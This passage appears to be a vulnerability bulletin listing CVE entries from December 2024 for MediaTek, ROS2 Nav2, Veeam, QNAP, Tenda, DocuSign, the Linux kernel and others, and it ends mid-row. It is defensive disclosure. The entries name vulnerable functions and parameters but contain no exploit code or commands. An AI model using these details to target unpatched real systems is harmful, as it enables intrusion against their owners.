| MediaTek, Inc.--MT6580, MT6739, MT6761, MT6765, MT6768, MT6779, MT6781, MT6785, MT6789, MT6833, MT6835, MT6853, MT6855, MT6873, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6896, MT6897, MT6983, MT6985, MT6989, MT8321, MT8666, MT8667, MT8673, MT8678, MT8765, MT8766, MT8766R, MT8768, MT8771, MT8781, MT8786, MT8788, MT8788E, MT8791T, MT8797, MT8798, MT8863T |
In Telephony, there is a possible out of bounds read due to a missing bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS09289881; Issue ID: MSV-2025. | 2024-12-02 | not yet calculated | CVE-2024-20129 |
| n/a--n/a |
An issue in Razer Synapse 3 v.3.9.131.20813 and Synapse 3 App v.20240213 allows a local attacker to execute arbitrary code via the export parameter of the Chroma Effects function in the Profiles component. | 2024-12-03 | not yet calculated | CVE-2024-29404 |
| n/a--n/a |
Buffer Overflow vulnerability in radarorg radare2 v.5.8.8 allows an attacker to execute arbitrary code via the parse_die function. | 2024-12-02 | not yet calculated | CVE-2024-29645 |
| n/a--n/a |
Insecure Permissions vulnerability in Open Robotics Robotic Operating System 2 (ROS2) navigation2- ROS2-humble and navigation 2-humble allows a local attacker to execute arbitrary code via the error-thrown mechanism in nav2_bt_navigator. | 2024-12-05 | not yet calculated | CVE-2024-30961 |
| n/a--n/a |
Buffer Overflow vulnerability in Open Robotics Robotic Operating System 2 (ROS2) navigation2- ROS2-humble and navigation 2-humble allows a local attacker to execute arbitrary code via the nav2_amcl process | 2024-12-05 | not yet calculated | CVE-2024-30962 |
| n/a--n/a |
The GriceMobile com.grice.call application 4.5.2 for Android enables any installed application (with no permissions) to place phone calls without user interaction by sending a crafted intent via the com.iui.mobile.presentation.MobileActivity. | 2024-12-04 | not yet calculated | CVE-2024-37574 |
| n/a--n/a |
The Mister org.mistergroup.shouldianswer application 1.4.264 for Android enables any installed application (with no permissions) to place phone calls without user interaction by sending a crafted intent via the org.mistergroup.shouldianswer.ui.default_dialer.DefaultDialerActivity component. | 2024-12-04 | not yet calculated | CVE-2024-37575 |
| n/a--n/a |
Open Robotics Robotic Operating System 2 (ROS2) and Nav2 humble versions were discovered to contain a use-after-free via the nav2_amcl process. This vulnerability is triggered via remotely sending a request for change the value of dynamic-parameter`/amcl z_rand ` . | 2024-12-06 | not yet calculated | CVE-2024-38921 |
| n/a--n/a |
Open Robotics Robotic Operating System 2 (ROS2) and Nav2 humble version was discovered to contain a heap overflow in the nav2_amcl process. This vulnerability is triggered via sending a crafted message to the component /initialpose. | 2024-12-06 | not yet calculated | CVE-2024-38922 |
| n/a--n/a |
Open Robotics Robotic Operating System 2 (ROS2) and Nav2 humble versions were discovered to contain a use-after-free via the nav2_amcl process. This vulnerability is triggered via remotely sending a request to change the value of dynamic-parameter`/amcl odom_frame_id` . | 2024-12-06 | not yet calculated | CVE-2024-38923 |
| n/a--n/a |
Open Robotics Robotic Operating System 2 (ROS2) and Nav2 humble versions were discovered to contain a use-after-free via the nav2_amcl process. This vulnerability is triggered via remotely sending a request to change the value of dynamic-parameter`/amcl laser_model_type` . | 2024-12-06 | not yet calculated | CVE-2024-38924 |
| n/a--n/a |
Open Robotics Robotic Operating System 2 (ROS2) and Nav2 humble versions were discovered to contain a use-after-free via the nav2_amcl process. This vulnerability is triggered via remotely sending a request for change the value of dynamic-parameter`/amcl z_max` . | 2024-12-06 | not yet calculated | CVE-2024-38925 |
| n/a--n/a |
Open Robotics Robotic Operating System 2 (ROS2) and Nav2 humble versions were discovered to contain a use-after-free via the nav2_amcl process. This vulnerability is triggered via remotely sending a request for change the value of dynamic-parameter `/amcl z_short`. | 2024-12-06 | not yet calculated | CVE-2024-38926 |
| n/a--n/a |
Open Robotics Robotic Operating System 2 (ROS2) and Nav2 humble versions were discovered to contain a use-after-free via the nav2_amcl process. This vulnerability is triggered via remotely sending a request to change the value of dynamic-parameter `/amcl do_beamskip`. | 2024-12-06 | not yet calculated | CVE-2024-38927 |
| n/a--n/a |
binux pyspider up to v0.3.10 was discovered to contain a Cross-Site Request Forgery (CSRF) via the Flask endpoints. | 2024-12-04 | not yet calculated | CVE-2024-39163 |
| n/a--n/a |
An issue in Aginode GigaSwitch V5 before version 7.06G allows authenticated attackers with Administrator privileges to upload an earlier firmware version, exposing the device to previously patched vulnerabilities. | 2024-12-04 | not yet calculated | CVE-2024-39219 |
| Veeam--Backup & Replication |
A vulnerability in Veeam Backup & Replication allows a low-privileged user with certain roles to perform remote code execution (RCE) by updating existing jobs. These jobs can be configured to run pre- and post-scripts, which can be located on a network share and are executed with elevated privileges by default. The user can update a job and schedule it to run almost immediately, allowing arbitrary code execution on the server. | 2024-12-04 | not yet calculated | CVE-2024-40717 |
| n/a--n/a |
DTStack Taier 1.4.0 allows remote attackers to specify the jobName parameter in the console listNames function to cause a SQL injection vulnerability | 2024-12-05 | not yet calculated | CVE-2024-41579 |
| n/a--n/a |
Insecure Permissions vulnerability in Open Robotics Robotic Operating System 2 ROS2 navigation2 v.humble allows an attacker to execute arbitrary code via the dyn_param_handler_ component. | 2024-12-06 | not yet calculated | CVE-2024-41644 |
| n/a--n/a |
Insecure Permissions vulnerability in Open Robotics Robotic Operating System 2 ROS2 navigation2 v.humble allows an attacker to execute arbitrary code via a crafted script to the nav2__amcl. | 2024-12-06 | not yet calculated | CVE-2024-41645 |
| n/a--n/a |
Insecure Permissions vulnerability in Open Robotics Robotic Operating System 2 ROS2 navigation2 v.humble allows an attacker to execute arbitrary code via a crafted script to the nav2_dwb_controller. | 2024-12-06 | not yet calculated | CVE-2024-41646 |
| n/a--n/a |
Insecure Permissions vulnerability in Open Robotics Robotic Operating System 2 ROS2 navigation2 v.humble allows an attacker to execute arbitrary code via a crafted script to the nav2_mppi_controller. | 2024-12-06 | not yet calculated | CVE-2024-41647 |
| n/a--n/a |
Insecure Permissions vulnerability in Open Robotics Robotic Operating System 2 ROS2 navigation2 v.humble allows an attacker to execute arbitrary code via a crafted script to the nav2_regulated_pure_pursuit_controller. | 2024-12-06 | not yet calculated | CVE-2024-41648 |
| n/a--n/a |
Insecure Permissions vulnerability in Open Robotics Robotic Operating System 2 ROS2 navigation2 v.humble allows an attacker to execute arbitrary code via a crafted script to the executor_thread_. | 2024-12-06 | not yet calculated | CVE-2024-41649 |
| n/a--n/a |
Insecure Permissions vulnerability in Open Robotics Robotic Operating System 2 ROS2 navigation2 v.humble allows an attacker to execute arbitrary code via a crafted script to the nav2_costmap_2d. | 2024-12-06 | not yet calculated | CVE-2024-41650 |
| Veeam--Service Provider Console |
From the VSPC management agent machine, under condition that the management agent is authorized on the server, it is possible to remove arbitrary files on the VSPC server machine. | 2024-12-04 | not yet calculated | CVE-2024-42449 |
| Veeam--Backup & Replication |
A vulnerability in Veeam Backup & Replication allows low-privileged users to leak all saved credentials in plaintext. This is achieved by calling a series of methods over an external protocol, ultimately retrieving the credentials using a malicious setup on the attacker's side. This exposes sensitive data, which could be used for further attacks, including unauthorized access to systems managed by the platform. | 2024-12-04 | not yet calculated | CVE-2024-42451 |
| Veeam--Backup & Replication |
A vulnerability in Veeam Backup & Replication allows a low-privileged user to start an agent remotely in server mode and obtain credentials, effectively escalating privileges to system-level access. This allows the attacker to upload files to the server with elevated privileges. The vulnerability exists because remote calls bypass permission checks, leading to full system compromise. | 2024-12-04 | not yet calculated | CVE-2024-42452 |
| Veeam--Backup & Replication |
A vulnerability Veeam Backup & Replication allows low-privileged users to control and modify configurations on connected virtual infrastructure hosts. This includes the ability to power off virtual machines, delete files in storage, and make configuration changes, potentially leading to Denial of Service (DoS) and data integrity issues. The vulnerability is caused by improper permission checks in methods accessed via management services. | 2024-12-04 | not yet calculated | CVE-2024-42453 |
| Veeam--Backup & Replication |
A vulnerability in Veeam Backup & Replication allows a low-privileged user to connect to remoting services and exploit insecure deserialization by sending a serialized temporary file collection. This exploit allows the attacker to delete any file on the system with service account privileges. The vulnerability is caused by an insufficient blacklist during the deserialization process. | 2024-12-04 | not yet calculated | CVE-2024-42455 |
| Veeam--Backup & Replication |
A vulnerability in Veeam Backup & Replication platform allows a low-privileged user with a specific role to exploit a method that updates critical configuration settings, such as modifying the trusted client certificate used for authentication on a specific port. This can result in unauthorized access, enabling the user to call privileged methods and initiate critical services. The issue arises due to insufficient permission requirements on the method, allowing users with low privileges to perform actions that should require higher-level permissions. | 2024-12-04 | not yet calculated | CVE-2024-42456 |
| Veeam--Backup & Replication |
A vulnerability in Veeam Backup & Replication allows users with certain operator roles to expose saved credentials by leveraging a combination of methods in a remote management interface. This can be achieved using a session object that allows for credential enumeration and exploitation, leading to the leak of plaintext credentials to a malicious host. The attack is facilitated by improper usage of a method that allows operators to add a new host with an attacker-controlled IP, enabling them to retrieve sensitive credentials in plaintext. | 2024-12-04 | not yet calculated | CVE-2024-42457 |
| n/a--n/a |
Open Robotics Robotic Operating System 2 ROS2 navigation2 v.humble was discovered to contain a segmentation violation via the component theta_star::ThetaStar::isUnsafeToPlan(). | 2024-12-06 | not yet calculated | CVE-2024-44852 |
| n/a--n/a |
Open Robotics Robotic Operating System 2 ROS2 navigation2 v.humble was discovered to contain a NULL pointer dereference via the component computeControl(). | 2024-12-06 | not yet calculated | CVE-2024-44853 |
| n/a--n/a |
Open Robotics Robotic Operating System 2 ROS2 navigation2 v.humble was discovered to contain a NULL pointer dereference via the component smoothPlan(). | 2024-12-06 | not yet calculated | CVE-2024-44854 |
| n/a--n/a |
Open Robotics Robotic Operating System 2 ROS2 navigation2 v.humble was discovered to contain a NULL pointer dereference via the component nav2_navfn_planner(). | 2024-12-06 | not yet calculated | CVE-2024-44855 |
| n/a--n/a |
Open Robotics Robotic Operating System 2 ROS2 navigation2 v.humble was discovered to contain a NULL pointer dereference via the component nav2_smac_planner(). | 2024-12-06 | not yet calculated | CVE-2024-44856 |
| Veeam--Backup & Replication |
A vulnerability exists where a low-privileged user can exploit insufficient permissions in credential handling to leak NTLM hashes of saved credentials. The exploitation involves using retrieved credentials to expose sensitive NTLM hashes, impacting systems beyond the initial target and potentially leading to broader security vulnerabilities. | 2024-12-04 | not yet calculated | CVE-2024-45204 |
| Ubiquiti--UniFi iOS App |
An Improper Certificate Validation on the UniFi iOS App managing a standalone UniFi Access Point (not using UniFi Network Application) could allow a malicious actor with access to an adjacent network to take control of this UniFi Access Point. Affected Products: UniFi iOS App (Version 10.17.7 and earlier) Mitigation: UniFi iOS App (Version 10.18.0 or later). | 2024-12-04 | not yet calculated | CVE-2024-45205 |
| Veeam--Service Provider Console |
A vulnerability in Veeam Service Provider Console has been identified, which allows to perform arbitrary HTTP requests to arbitrary hosts of the network and get information about internal resources. | 2024-12-04 | not yet calculated | CVE-2024-45206 |
| Veeam--Agent for Windows |
DLL injection in Veeam Agent for Windows can occur if the system's PATH variable includes insecure locations. When the agent runs, it searches these directories for necessary DLLs. If an attacker places a malicious DLL in one of these directories, the Veeam Agent might load it inadvertently, allowing the attacker to execute harmful code. This could lead to unauthorized access, data theft, or disruption of services | 2024-12-04 | not yet calculated | CVE-2024-45207 |
| n/a--n/a |
An issue was discovered in Centreon centreon-bam 24.04, 23.10, 23.04, and 22.10. SQL injection can occur in the user-settings form. Exploitation is only accessible to authenticated users with high-privileged access. | 2024-12-03 | not yet calculated | CVE-2024-45757 |
| I-O DATA DEVICE, INC.--UD-LT1 |
Incorrect permission assignment for critical resource issue exists in UD-LT1 firmware Ver.2.1.8 and earlier and UD-LT1/EX firmware Ver.2.1.8 and earlier. If an attacker with the guest account of the affected products accesses a specific file, the information containing credentials may be obtained. | 2024-12-05 | not yet calculated | CVE-2024-45841 |
| n/a--n/a |
An authenticated arbitrary file upload vulnerability in the /documentCache/upload endpoint of InfoDom Performa 365 v4.0.1 allows attackers to execute arbitrary code via uploading a crafted SVG file. | 2024-12-03 | not yet calculated | CVE-2024-46625 |
| I-O DATA DEVICE, INC.--UD-LT1 |
UD-LT1 firmware Ver.2.1.8 and earlier and UD-LT1/EX firmware Ver.2.1.8 and earlier allow a remote authenticated attacker with an administrative account to execute arbitrary OS commands. | 2024-12-05 | not yet calculated | CVE-2024-47133 |
| n/a--n/a |
An issue in INOVANCE AM401_CPU1608TPTN allows a remote attacker to execute arbitrary code via the ExecuteUserProgramUpgrade function | 2024-12-04 | not yet calculated | CVE-2024-48453 |
| n/a--n/a |
PhpGurukul Medical Card Generation System v1.0 is vulnerable to Cross Site Scripting (XSS) in /admin/search-medicalcard.php via the searchdata parameter. | 2024-12-06 | not yet calculated | CVE-2024-48703 |
| QNAP Systems Inc.--QTS |
An improper authentication vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow remote attackers to compromise the security of the system. We have already fixed the vulnerability in the following versions: QTS 5.1.9.2954 build 20241120 and later QTS 5.2.2.2950 build 20241114 and later QuTS hero h5.1.9.2954 build 20241120 and later QuTS hero h5.2.2.2952 build 20241116 and later | 2024-12-06 | not yet calculated | CVE-2024-48859 |
| QNAP Systems Inc.--License Center |
A command injection vulnerability has been reported to affect License Center. If exploited, the vulnerability could allow remote attackers to execute arbitrary commands. We have already fixed the vulnerability in the following version: License Center 1.9.43 and later | 2024-12-06 | not yet calculated | CVE-2024-48863 |
| QNAP Systems Inc.--QTS |
An improper certificate validation vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow attackers with local network access to compromise the security of the system. We have already fixed the vulnerability in the following versions: QTS 5.1.9.2954 build 20241120 and later QTS 5.2.2.2950 build 20241114 and later QuTS hero h5.1.9.2954 build 20241120 and later QuTS hero h5.2.2.2952 build 20241116 and later | 2024-12-06 | not yet calculated | CVE-2024-48865 |
| QNAP Systems Inc.--QTS |
An improper handling of URL encoding (Hex Encoding) vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow remote attackers to run the system into unexpected state. We have already fixed the vulnerability in the following versions: QTS 5.1.9.2954 build 20241120 and later QTS 5.2.2.2950 build 20241114 and later QuTS hero h5.1.9.2954 build 20241120 and later QuTS hero h5.2.2.2952 build 20241116 and later | 2024-12-06 | not yet calculated | CVE-2024-48866 |
| QNAP Systems Inc.--QTS |
An improper neutralization of CRLF sequences ('CRLF Injection') vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow remote attackers to modify application data. We have already fixed the vulnerability in the following versions: QTS 5.1.9.2954 build 20241120 and later QTS 5.2.2.2950 build 20241114 and later QuTS hero h5.1.9.2954 build 20241120 and later QuTS hero h5.2.2.2952 build 20241116 and later | 2024-12-06 | not yet calculated | CVE-2024-48867 |
| QNAP Systems Inc.--QTS |
An improper neutralization of CRLF sequences ('CRLF Injection') vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow remote attackers to modify application data. We have already fixed the vulnerability in the following versions: QTS 5.1.9.2954 build 20241120 and later QTS 5.2.2.2950 build 20241114 and later QuTS hero h5.1.9.2954 build 20241120 and later QuTS hero h5.2.2.2952 build 20241116 and later | 2024-12-06 | not yet calculated | CVE-2024-48868 |
| PlexRipper--PlexRipper |
PlexRipper is a cross-platform media downloader for Plex. PlexRipper's open CORS policy allows attackers to gain sensitive information from PlexRipper by getting the user to access the attacker's domain. This allows an attacking website to access the /api/PlexAccount endpoint and steal the user's Plex login. This vulnerability is fixed in 0.24.0. | 2024-12-02 | not yet calculated | CVE-2024-49763 |
| Snap One--OVRC cloud |
Snap One OVRC cloud uses the MAC address as an identifier to provide information when requested. An attacker can impersonate other devices by supplying enumerated MAC addresses and receive sensitive information about the device. | 2024-12-02 | not yet calculated | CVE-2024-50380 |
| Snap One--OVRC cloud |
A vulnerability exists in Snap One OVRC cloud where an attacker can impersonate a Hub device and send requests to claim and unclaim devices. The attacker only needs to provide the MAC address of the targeted device and can make a request to unclaim it from its original connection and make a request to claim it. | 2024-12-02 | not yet calculated | CVE-2024-50381 |
| QNAP Systems Inc.--SMB Service |
A SQL injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow remote attackers to inject malicious code. We have already fixed the vulnerability in the following version: SMB Service 4.15.002 and later SMB Service h4.15.002 and later | 2024-12-06 | not yet calculated | CVE-2024-50387 |
| QNAP Systems Inc.--HBS 3 Hybrid Backup Sync |
An OS command injection vulnerability has been reported to affect HBS 3 Hybrid Backup Sync. If exploited, the vulnerability could allow remote attackers to execute commands. We have already fixed the vulnerability in the following version: HBS 3 Hybrid Backup Sync 25.1.1.673 and later | 2024-12-06 | not yet calculated | CVE-2024-50388 |
| QNAP Systems Inc.--QuRouter |
A SQL injection vulnerability has been reported to affect QuRouter. If exploited, the vulnerability could allow remote attackers to inject malicious code. We have already fixed the vulnerability in the following version: QuRouter 2.4.5.032 and later | 2024-12-06 | not yet calculated | CVE-2024-50389 |
| QNAP Systems Inc.--QTS |
A command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow remote attackers to execute arbitrary commands. We have already fixed the vulnerability in the following versions: QTS 5.1.9.2954 build 20241120 and later QTS 5.2.2.2950 build 20241114 and later QuTS hero h5.1.9.2954 build 20241120 and later QuTS hero h5.2.2.2952 build 20241116 and later | 2024-12-06 | not yet calculated | CVE-2024-50393 |
| QNAP Systems Inc.--QTS |
A use of externally-controlled format string vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow remote attackers who have gained administrator access to obtain secret data or modify memory. We have already fixed the vulnerability in the following versions: QTS 5.1.9.2954 build 20241120 and later QTS 5.2.2.2950 build 20241114 and later QuTS hero h5.1.9.2954 build 20241120 and later QuTS hero h5.2.2.2952 build 20241116 and later | 2024-12-06 | not yet calculated | CVE-2024-50402 |
| QNAP Systems Inc.--QTS |
A use of externally-controlled format string vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow remote attackers who have gained administrator access to obtain secret data or modify memory. We have already fixed the vulnerability in the following versions: QTS 5.2.2.2950 build 20241114 and later QuTS hero h5.2.2.2952 build 20241116 and later | 2024-12-06 | not yet calculated | CVE-2024-50403 |
| QNAP Systems Inc.--Qsync Central |
A link following vulnerability has been reported to affect Qsync Central. If exploited, the vulnerability could allow remote attackers who have gained user access to traverse the file system to unintended locations. We have already fixed the vulnerability in the following versions: Qsync Central 4.4.0.16_20240819 ( 2024/08/19 ) and later | 2024-12-06 | not yet calculated | CVE-2024-50404 |
| n/a--n/a |
Insecure deserialization in Hodoku v2.3.0 to v2.3.2 allows attackers to execute arbitrary code. | 2024-12-03 | not yet calculated | CVE-2024-51363 |
| DocuSign--DocuSign |
User Interface (UI) Misrepresentation of Critical Information vulnerability in DocuSign allows Content Spoofing. The SaaS AI assistant ignores hidden content that is rendered after signing, misleading the user. For reference see: CVE-2024-52276 This issue affects DocuSign: through 2024-12-04. | 2024-12-04 | not yet calculated | CVE-2024-52269 |
| DropBox(HelloSign)--DropBox Sign |
User Interface (UI) Misrepresentation of Critical Information vulnerability in DropBox Sign(HelloSign) allows Content Spoofing. Displayed version does not show the layer flattened version, once download, If printed (e.g. via Google Chrome -> Examine the print preview): Will render the vulnerability only, not all layers are flattened. This issue affects DropBox Sign(HelloSign): through 2024-12-04. | 2024-12-05 | not yet calculated | CVE-2024-52270 |
| Documenso--Documenso |
User Interface (UI) Misrepresentation of Critical Information vulnerability in Documenso allows Content Spoofing.Displayed version does not show the layer flattened version, once download, If printed (e.g. via Google Chrome -> Examine the print preview): Will render the vulnerability only, not all layers are flattened. This issue affects Documenso: through 1.8.0, >1.8.0 and Documenso SaaS (Hosted) as of 2024-12-05. | 2024-12-05 | not yet calculated | CVE-2024-52271 |
| Shenzhen Tenda Technology Co--Tenda AC6V2 |
Stack-based Buffer Overflow vulnerability in Shenzhen Tenda Technology Co Tenda AC6V2 (fromAdvSetLanip(overflow arg:lanMask) modules) allows Overflow Buffers.This issue affects Tenda AC6V2: through 15.03.06.50 | 2024-12-04 | not yet calculated | CVE-2024-52272 |
| Shenzhen Tenda Technology Co--Tenda AC6V2 |
Stack-based Buffer Overflow vulnerability in Shenzhen Tenda Technology Co Tenda AC6V2 (setDoublePppoeConfig->guest_ip_check(overflow arg: mask) modules) allows Overflow Buffers.This issue affects Tenda AC6V2: through 15.03.06.50 | 2024-12-04 | not yet calculated | CVE-2024-52273 |
| Shenzhen Tenda Technology Co--Tenda AC6V2 |
Stack-based Buffer Overflow vulnerability in Shenzhen Tenda Technology Co Tenda AC6V2 (setDoubleL2tpConfig->guest_ip_check(overflow arg: mask) modules) allows Overflow Buffers.This issue affects Tenda AC6V2: through 15.03.06.50 | 2024-12-04 | not yet calculated | CVE-2024-52274 |
| Shenzhen Tenda Technology Co--Tenda AC6V2 |
Stack-based Buffer Overflow vulnerability in Shenzhen Tenda Technology Co Tenda AC6V2 (fromWizardHandle modules) allows Overflow Buffers.This issue affects Tenda AC6V2: through 15.03.06.50. | 2024-12-04 | not yet calculated | CVE-2024-52275 |
| DocuSign--DocuSign |
User Interface (UI) Misrepresentation of Critical Information vulnerability in DocuSign allows Content Spoofing. 1. Displayed version does not show the layer flattened version, which is provided when the "Print" option is used. 2. Displayed version does not show the layer flattened version, which is provided when the combined download option is used. 3. Displayed version does not show the layer flattened version, which is also the provided version when downloading the result in the uncombined option. Once download, If printed (e.g. via Google Chrome -> Examine the print preview): Will render the vulnerability only, not all layers are flattened. This issue affects DocuSign: through 2024-12-04. | 2024-12-04 | not yet calculated | CVE-2024-52276 |
| DocuSeal--DocuSeal |
User Interface (UI) Misrepresentation of Critical Information vulnerability in DocuSeal allows Content Spoofing.Displayed version does not show the layer flattened version, once download, If printed (e.g. via Google Chrome -> Examine the print preview): Will render the vulnerability only, not all layers are flattened. This issue affects DocuSeal: through 1.8.1, >1.8.1. | 2024-12-04 | not yet calculated | CVE-2024-52277 |
| I-O DATA DEVICE, INC.--UD-LT1 |
Inclusion of undocumented features or chicken bits issue exists in UD-LT1 firmware Ver.2.1.8 and earlier and UD-LT1/EX firmware Ver.2.1.8 and earlier. A remote attacker may disable the firewall function of the affected products. As a result, an arbitrary OS command may be executed and/or configuration settings of the device may be altered. | 2024-12-05 | not yet calculated | CVE-2024-52564 |
| simplesamlphp--xml-common |
SimpleSAMLphp xml-common is a common classes for handling XML-structures. When loading an (untrusted) XML document, for example the SAMLResponse, it's possible to induce an XXE. This vulnerability is fixed in 1.19.0. | 2024-12-02 | not yet calculated | CVE-2024-52596 |
| pillarjs--path-to-regexp |
path-to-regexp turns path strings into a regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. The regular expression that is vulnerable to backtracking can be generated in the 0.1.x release of path-to-regexp. Upgrade to 0.1.12. This vulnerability exists because of an incomplete fix for CVE-2024-45296. | 2024-12-05 | not yet calculated | CVE-2024-52798 |
| element-hq--synapse |
Synapse is an open-source Matrix homeserver. In Synapse before 1.120.1, multipart/form-data requests can in certain configurations transiently increase memory consumption beyond expected levels while processing the request, which can be used to amplify denial of service attacks. Synapse 1.120.1 resolves the issue by denying requests with unsupported multipart/form-data content type. | 2024-12-03 | not yet calculated | CVE-2024-52805 |
| element-hq--synapse |
Synapse is an open-source Matrix homeserver. Synapse versions before 1.120.1 fail to properly validate invites received over federation. This vulnerability allows a malicious server to send a specially crafted invite that disrupts the invited user's /sync functionality. Synapse 1.120.1 rejects such invalid invites received over federation and restores the ability to sync for affected users. | 2024-12-03 | not yet calculated | CVE-2024-52815 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: hv_sock: Initializing vsk->trans to NULL to prevent a dangling pointer When hvs is released, there is a possibility that vsk->trans may not be initialized to NULL, which could lead to a dangling pointer. This issue is resolved by initializing vsk->trans to NULL. | 2024-12-02 | not yet calculated | CVE-2024-53103 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: media: uvcvideo: Skip parsing frames of type UVC_VS_UNDEFINED in uvc_parse_format This can lead to out of bounds writes since frames of this type were not taken into account when calculating the size of the frames buffer in uvc_parse_streaming. | 2024-12-02 | not yet calculated | CVE-2024-53104 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: mm: page_alloc: move mlocked flag clearance into free_pages_prepare() Syzbot reported a bad page state problem caused by a page being freed using free_page() still having a mlocked flag at free_pages_prepare() stage: BUG: Bad page state in process syz.5.504 pfn:61f45 page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x61f45 flags: 0xfff00000080204(referenced|workingset|mlocked|node=0|zone=1|lastcpupid=0x7ff) raw: 00fff00000080204 0000000000000000 dead000000000122 0000000000000000 raw: 0000000000000000 0000000000000000 00000000ffffffff 0000000000000000 page dumped because: PAGE_FLAGS_CHECK_AT_FREE flag(s) set page_owner tracks the page as allocated page last allocated via order 0, migratetype Unmovable, gfp_mask 0x400dc0(GFP_KERNEL_ACCOUNT|__GFP_ZERO), pid 8443, tgid 8442 (syz.5.504), ts 201884660643, free_ts 201499827394 set_page_owner include/linux/page_owner.h:32 [inline] post_alloc_hook+0x1f3/0x230 mm/page_alloc.c:1537 prep_new_page mm/page_alloc.c:1545 [inline] get_page_from_freelist+0x303f/0x3190 mm/page_alloc.c:3457 __alloc_pages_noprof+0x292/0x710 mm/page_alloc.c:4733 alloc_pages_mpol_noprof+0x3e8/0x680 mm/mempolicy.c:2265 kvm_coalesced_mmio_init+0x1f/0xf0 virt/kvm/coalesced_mmio.c:99 kvm_create_vm virt/kvm/kvm_main.c:1235 [inline] kvm_dev_ioctl_create_vm virt/kvm/kvm_main.c:5488 [inline] kvm_dev_ioctl+0x12dc/0x2240 virt/kvm/kvm_main.c:5530 __do_compat_sys_ioctl fs/ioctl.c:1007 [inline] __se_compat_sys_ioctl+0x510/0xc90 fs/ioctl.c:950 do_syscall_32_irqs_on arch/x86/entry/common.c:165 [inline] __do_fast_syscall_32+0xb4/0x110 arch/x86/entry/common.c:386 do_fast_syscall_32+0x34/0x80 arch/x86/entry/common.c:411 entry_SYSENTER_compat_after_hwframe+0x84/0x8e page last free pid 8399 tgid 8399 stack trace: reset_page_owner include/linux/page_owner.h:25 [inline] free_pages_prepare mm/page_alloc.c:1108 [inline] free_unref_folios+0xf12/0x18d0 mm/page_alloc.c:2686 folios_put_refs+0x76c/0x860 mm/swap.c:1007 free_pages_and_swap_cache+0x5c8/0x690 mm/swap_state.c:335 __tlb_batch_free_encoded_pages mm/mmu_gather.c:136 [inline] tlb_batch_pages_flush mm/mmu_gather.c:149 [inline] tlb_flush_mmu_free mm/mmu_gather.c:366 [inline] tlb_flush_mmu+0x3a3/0x680 mm/mmu_gather.c:373 tlb_finish_mmu+0xd4/0x200 mm/mmu_gather.c:465 exit_mmap+0x496/0xc40 mm/mmap.c:1926 __mmput+0x115/0x390 kernel/fork.c:1348 exit_mm+0x220/0x310 kernel/exit.c:571 do_exit+0x9b2/0x28e0 kernel/exit.c:926 do_group_exit+0x207/0x2c0 kernel/exit.c:1088 __do_sys_exit_group kernel/exit.c:1099 [inline] __se_sys_exit_group kernel/exit.c:1097 [inline] __x64_sys_exit_group+0x3f/0x40 kernel/exit.c:1097 x64_sys_call+0x2634/0x2640 arch/x86/include/generated/asm/syscalls_64.h:232 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xf3/0x230 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f Modules linked in: CPU: 0 UID: 0 PID: 8442 Comm: syz.5.504 Not tainted 6.12.0-rc6-syzkaller #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 09/13/2024 Call Trace: <TASK> __dump_stack lib/dump_stack.c:94 [inline] dump_stack_lvl+0x241/0x360 lib/dump_stack.c:120 bad_page+0x176/0x1d0 mm/page_alloc.c:501 free_page_is_bad mm/page_alloc.c:918 [inline] free_pages_prepare mm/page_alloc.c:1100 [inline] free_unref_page+0xed0/0xf20 mm/page_alloc.c:2638 kvm_destroy_vm virt/kvm/kvm_main.c:1327 [inline] kvm_put_kvm+0xc75/0x1350 virt/kvm/kvm_main.c:1386 kvm_vcpu_release+0x54/0x60 virt/kvm/kvm_main.c:4143 __fput+0x23f/0x880 fs/file_table.c:431 task_work_run+0x24f/0x310 kernel/task_work.c:239 exit_task_work include/linux/task_work.h:43 [inline] do_exit+0xa2f/0x28e0 kernel/exit.c:939 do_group_exit+0x207/0x2c0 kernel/exit.c:1088 __do_sys_exit_group kernel/exit.c:1099 [in ---truncated--- | 2024-12-02 | not yet calculated | CVE-2024-53105 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: ima: fix buffer overrun in ima_eventdigest_init_common Function ima_eventdigest_init() calls ima_eventdigest_init_common() with HASH_ALGO__LAST which is then used to access the array hash_digest_size[] leading to buffer overrun. Have a conditional statement to handle this. | 2024-12-02 | not yet calculated | CVE-2024-53106 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: fs/proc/task_mmu: prevent integer overflow in pagemap_scan_get_args() The "arg->vec_len" variable is a u64 that comes from the user at the start of the function. The "arg->vec_len * sizeof(struct page_region))" multiplication can lead to integer wrapping. Use size_mul() to avoid that. Also the size_add/mul() functions work on unsigned long so for 32bit systems we need to ensure that "arg->vec_len" fits in an unsigned long. | 2024-12-02 | not yet calculated | CVE-2024-53107 |
| Linux--Linux |
